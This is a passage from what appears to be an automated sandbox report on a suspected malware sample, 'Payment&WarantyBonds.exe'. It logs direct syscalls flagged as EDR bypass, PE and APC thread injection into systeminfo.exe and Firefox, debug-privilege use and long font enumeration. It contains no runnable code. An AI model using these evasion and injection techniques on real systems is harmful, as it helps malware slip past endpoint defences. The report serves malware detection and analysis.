                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01421460 mov eax, dword ptr fs:[00000030h]2_2_01421460
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01421460 mov eax, dword ptr fs:[00000030h]2_2_01421460
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01421460 mov eax, dword ptr fs:[00000030h]2_2_01421460
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01421460 mov eax, dword ptr fs:[00000030h]2_2_01421460
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0143F460 mov eax, dword ptr fs:[00000030h]2_2_0143F460
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0143F460 mov eax, dword ptr fs:[00000030h]2_2_0143F460
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0143F460 mov eax, dword ptr fs:[00000030h]2_2_0143F460
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0143F460 mov eax, dword ptr fs:[00000030h]2_2_0143F460
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0143F460 mov eax, dword ptr fs:[00000030h]2_2_0143F460
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0143F460 mov eax, dword ptr fs:[00000030h]2_2_0143F460
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014AC460 mov ecx, dword ptr fs:[00000030h]2_2_014AC460
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F547F mov eax, dword ptr fs:[00000030h]2_2_014F547F
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144A470 mov eax, dword ptr fs:[00000030h]2_2_0144A470
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144A470 mov eax, dword ptr fs:[00000030h]2_2_0144A470
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144A470 mov eax, dword ptr fs:[00000030h]2_2_0144A470
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01458402 mov eax, dword ptr fs:[00000030h]2_2_01458402
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01458402 mov eax, dword ptr fs:[00000030h]2_2_01458402
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01458402 mov eax, dword ptr fs:[00000030h]2_2_01458402
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144340D mov eax, dword ptr fs:[00000030h]2_2_0144340D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A7410 mov eax, dword ptr fs:[00000030h]2_2_014A7410
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtOpenKeyEx: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtQueryValueKey: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory written: C:\Users\user\Desktop\Payment&WarantyBonds.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: NULL target: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: NULL target: C:\Windows\SysWOW64\systeminfo.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: NULL target: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: NULL target: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\systeminfo.exeThread register set: target process: 5856Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\systeminfo.exeThread APC queued: target process: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess created: C:\Users\user\Desktop\Payment&WarantyBonds.exe "C:\Users\user\Desktop\Payment&WarantyBonds.exe"Jump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: oDnyHukDVUZk.exe, 00000006.00000002.4148140785.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000006.00000000.1987635269.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000000.2136830520.0000000000C30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: oDnyHukDVUZk.exe, 00000006.00000002.4148140785.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000006.00000000.1987635269.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000000.2136830520.0000000000C30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: oDnyHukDVUZk.exe, 00000006.00000002.4148140785.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000006.00000000.1987635269.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000000.2136830520.0000000000C30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: oDnyHukDVUZk.exe, 00000006.00000002.4148140785.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000006.00000000.1987635269.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000000.2136830520.0000000000C30000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Users\user\Desktop\Payment&WarantyBonds.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
